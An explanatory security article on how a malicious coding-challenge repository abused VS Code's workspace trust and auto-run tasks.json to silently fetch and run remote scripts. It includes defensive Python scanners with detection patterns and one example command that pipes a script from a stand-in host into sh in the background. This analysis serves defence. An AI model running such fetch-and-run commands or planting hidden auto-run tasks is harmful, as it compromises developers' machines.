A developer's investigation into a suspicious coding challenge reveals how VS Code's trust mechanism can be exploited to automatically execute malicious shell commands, highlighting a critical security oversight in a widely-used development environment.



The VS Code trust dialog presents a deceptively simple choice: trust the authors of this folder, or don't. Most developers click through without a second thought, assuming it's a minor security formality. This trust, however, extends far beyond what the dialog implies, creating a vector for automatic code execution that can compromise systems with minimal user interaction.

When a developer opens and trusts a folder containing a .vscode/tasks.json file, VS Code can run tasks from that file without further prompts, provided they are configured to run when the folder opens (runOptions.runOn set to folderOpen). The trust dialog's warning, that "trusting the authors can lead to the automatic execution of files," is technically accurate but fails to convey the immediacy of the threat. A task can also ask VS Code not to reveal its terminal panel, so execution can happen silently in the background. This behavior transforms a seemingly benign workspace configuration into a potential Trojan horse.

The mechanism is straightforward yet powerful. The tasks.json file defines commands that VS Code can run on behalf of the developer. These tasks are typically used for build scripts, test runners, or deployment pipelines. In the hands of a malicious actor, they become a delivery system for arbitrary code. The attacker needs only to convince a developer to open a folder containing a malicious tasks.json file and click "trust." The execution chain begins immediately.
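To make the mechanism concrete, here is a minimal sketch in Python that parses a tasks.json document and picks out the tasks set to run on folder open. The embedded file content, the task labels, and the helper names `find_auto_run_tasks` and `is_hidden` are all hypothetical and written for illustration; they are not taken from the repository discussed in this article.

```python
import json

# Hypothetical tasks.json content, written for illustration only.
# It is NOT the file from the repository discussed in this article.
EXAMPLE_TASKS_JSON = """
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build"
    },
    {
      "label": "prepare-env",
      "type": "shell",
      "command": "echo this would run when the folder opens",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}
"""


def find_auto_run_tasks(tasks_config: dict) -> list:
    """Return the tasks that ask VS Code to run them when the folder opens."""
    flagged = []
    for task in tasks_config.get("tasks", []):
        run_on = task.get("runOptions", {}).get("runOn")
        if run_on == "folderOpen":
            flagged.append(task)
    return flagged


def is_hidden(task: dict) -> bool:
    """True if the task asks VS Code never to reveal its terminal panel."""
    return task.get("presentation", {}).get("reveal") == "never"


if __name__ == "__main__":
    config = json.loads(EXAMPLE_TASKS_JSON)
    for task in find_auto_run_tasks(config):
        visibility = "hidden" if is_hidden(task) else "visible"
        print(f"{task['label']}: runs on folder open ({visibility} terminal)")
```

In this example only the second task is flagged. An ordinary build task like the first one runs only when the developer invokes it.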

This vulnerability becomes particularly concerning in the context of remote work and collaborative coding. Developers frequently clone repositories from unknown sources, especially when participating in coding challenges, evaluating open-source projects, or exploring new frameworks. The assumption that a repository is safe simply because it's hosted on GitHub or contains a coding exercise creates a dangerous blind spot.



The investigation into the Solvolabs coding challenge demonstrates how this vulnerability can be weaponized. The repository contained a .vscode/tasks.json file that, upon trusting the folder, would execute a series of commands. These commands downloaded shell scripts from external domains, which in turn fetched additional payloads. The scripts used short-lived JWT tokens to obscure their activity and attempted to execute code in the background without user visibility.

The attack chain revealed several sophisticated techniques:

Multi-stage payload delivery: The initial script downloaded a secondary script, which then fetched the final payload. This layered approach complicates detection and analysis.

Platform-specific execution: The tasks.json file contained commands for macOS, Linux, and Windows, ensuring broad compatibility across development environments.

Time-limited tokens: The JWT tokens expired after a short interval (3 minutes in this case), leaving little time to retrieve and analyze the payloads.

Background execution: The scripts attempted to run in the background using nohup and redirection to /dev/null, making them harder to spot.
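Several of the techniques listed above leave recognizable traces in the command strings themselves. The sketch below shows one way a reviewer might flag them. The pattern names and regular expressions are illustrative assumptions, not signatures extracted from the actual scripts, and they only cover Unix-style shell syntax, so a Windows-specific command would need its own checks.

```python
import re

# Heuristic patterns only. These are illustrative assumptions, not
# signatures taken from the malicious scripts described in the article.
RED_FLAGS = {
    "download piped to shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b"),
    "detached with nohup": re.compile(r"\bnohup\b"),
    "output discarded": re.compile(r">\s*/dev/null"),
    "backgrounded": re.compile(r"&\s*$"),
}

# tasks.json allows per-platform overrides under these keys.
PLATFORM_KEYS = ("osx", "linux", "windows")


def flag_command(command: str) -> list:
    """Return the names of every heuristic the command string matches."""
    return [name for name, pattern in RED_FLAGS.items() if pattern.search(command)]


def commands_by_platform(task: dict) -> dict:
    """Collect the default command plus any per-platform overrides."""
    commands = {}
    if isinstance(task.get("command"), str):
        commands["default"] = task["command"]
    for key in PLATFORM_KEYS:
        override = task.get(key)
        if isinstance(override, dict) and isinstance(override.get("command"), str):
            commands[key] = override["command"]
    return commands


if __name__ == "__main__":
    # Hypothetical task; example.invalid is a reserved, non-resolving domain.
    task = {
        "label": "setup",
        "command": "npm test",
        "osx": {
            "command": "nohup sh -c 'curl -s https://example.invalid/a.sh | sh' > /dev/null 2>&1 &"
        },
    }
    for platform, command in commands_by_platform(task).items():
        print(platform, flag_command(command))
```

Checking the per-platform overrides matters because the default command can look harmless while the override for the reviewer's own operating system does the real work. A match is a prompt for closer reading, not proof of malice, and an empty result is not proof of safety.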

The domains involved—codeviewer-three.vercel.app, jerryfox-platform.vercel.app, and vscode-lnc.vercel.app—show a pattern of creating disposable infrastructure for these attacks. Vercel's rapid response in blocking two of these domains demonstrates the importance of platform-level security measures, but the cat-and-mouse game continues.

This incident exposes a fundamental tension in modern development workflows. The convenience of automated task execution conflicts with security best practices. VS Code's design philosophy prioritizes developer productivity, assuming that developers will only open trusted projects. This assumption breaks down in practice, where developers routinely work with code from various sources.

The security implications extend beyond individual developers. Organizations that provide coding challenges or interview exercises could inadvertently expose candidates to malicious code. Conversely, malicious actors could target specific companies by sending coding challenges to their engineering teams, potentially gaining access to internal systems through compromised developer machines.

The git history of the malicious repository reveals a pattern of iterative development. The commit messages show a progression of domain names and approaches, suggesting the attackers were refining their technique. The odd commit messages—"fix task execution," "update token handling," "refactor for windows"—indicate a deliberate effort to maintain the appearance of legitimate development activity.

This case study highlights several critical security considerations for development environments:

For developers: Always inspect .vscode/tasks.json files before trusting a folder. Opening the folder in Restricted Mode, or reading the file in a plain text viewer, lets you do this without running any tasks. Be wary of coding challenges that require you to open repositories directly, especially from unknown sources. Consider using isolated environments or containers for evaluating untrusted code.

For organizations: Implement security policies around opening external repositories. Provide secure alternatives for coding challenges, such as web-based IDEs with restricted capabilities or containerized evaluation environments.

For tool developers: VS Code and similar IDEs should consider more granular trust models. Perhaps task execution should require explicit approval each time, or there should be a separate trust level for code execution versus workspace configuration.
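The advice to developers above, inspecting task files before trusting a folder, can be partly automated. The following sketch walks a cloned repository from the command line, before it is ever opened in an editor, and prints every task it finds. The function names and output format are hypothetical. It uses strict JSON parsing, so a tasks.json containing comments (which VS Code accepts) is reported for manual reading rather than parsed.

```python
import json
import sys
from pathlib import Path


def find_task_files(repo_root: Path) -> list:
    """Locate every tasks.json that sits directly inside a .vscode directory."""
    return sorted(
        p for p in repo_root.rglob("tasks.json") if p.parent.name == ".vscode"
    )


def summarize(task_file: Path) -> list:
    """Describe each task in the file, or say that it needs manual review."""
    try:
        config = json.loads(task_file.read_text(encoding="utf-8"))
    except json.JSONDecodeError:
        # VS Code tolerates comments in this file; strict JSON parsing does not.
        return [f"{task_file}: could not parse as strict JSON, read it by hand"]
    if not isinstance(config, dict):
        return [f"{task_file}: unexpected structure, read it by hand"]
    lines = []
    for task in config.get("tasks", []):
        run_on = task.get("runOptions", {}).get("runOn", "default")
        lines.append(
            f"{task_file}: label={task.get('label')!r} "
            f"runOn={run_on} command={task.get('command')!r}"
        )
    return lines


if __name__ == "__main__":
    # Usage: python inspect_tasks.py path/to/cloned/repo
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for task_file in find_task_files(root):
        for line in summarize(task_file):
            print(line)
```

Searching the whole tree rather than only the top level is a deliberate choice, since a repository may contain nested folders with their own .vscode directories. Any line showing runOn=folderOpen deserves a close look before the folder is trusted.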

The broader pattern here reflects a recurring theme in software security: convenience often comes at the cost of security. The trust dialog in VS Code represents a well-intentioned but insufficient security measure. It warns users about potential risks but doesn't provide enough context or control to make informed decisions.

As development tools become more sophisticated and interconnected, the attack surface expands. The line between development environment and production environment blurs, especially with the rise of cloud-based development platforms and containerized workflows. Security models must evolve to address this new reality.

The incident with the Solvolabs coding challenge serves as a cautionary tale. It demonstrates how a seemingly legitimate opportunity can conceal malicious intent, and how standard development tools can be weaponized. More importantly, it shows that security awareness must extend beyond traditional threats like phishing emails and malicious websites to include the tools and workflows developers use daily.

In the end, the developer who uncovered this scheme was fortunate. They had the technical knowledge to investigate the suspicious repository, the security awareness to recognize the threat, and the ethical responsibility to report it. Not all developers will have these advantages. As the complexity of our development environments grows, so too does the need for built-in security measures that protect users without requiring them to become security experts.

The trust dialog in VS Code may need a fundamental redesign—one that provides clearer warnings, more granular controls, and perhaps a default-deny approach for automatic code execution. Until then, developers must remain vigilant, treating every new repository as potentially hostile until proven otherwise. In the modern development landscape, trust should be earned, not automatically granted.

For those interested in the technical details, the investigation provides a clear example of how modern development tools can be exploited. The complete analysis, including the malicious scripts and their behavior, serves as a valuable case study for security researchers and developers alike. The incident underscores the importance of defense in depth, secure defaults, and the principle of least privilege in software development tools.

The conversation around this vulnerability extends beyond VS Code. Similar issues likely exist in other IDEs and development environments that automatically execute configuration files. The broader question is how to balance productivity with security in an era where development tools are increasingly powerful and interconnected. The answer may lie in rethinking fundamental assumptions about trust, execution, and user agency in software development workflows.

As we continue to build more sophisticated development tools, we must ensure that security is not an afterthought but a foundational principle. The convenience of automated task execution is valuable, but it should never come at the cost of user safety. The incident with the Solvolabs coding challenge is a reminder that in the digital world, trust is both a necessity and a vulnerability—and managing that balance is one of the great challenges of modern software development.
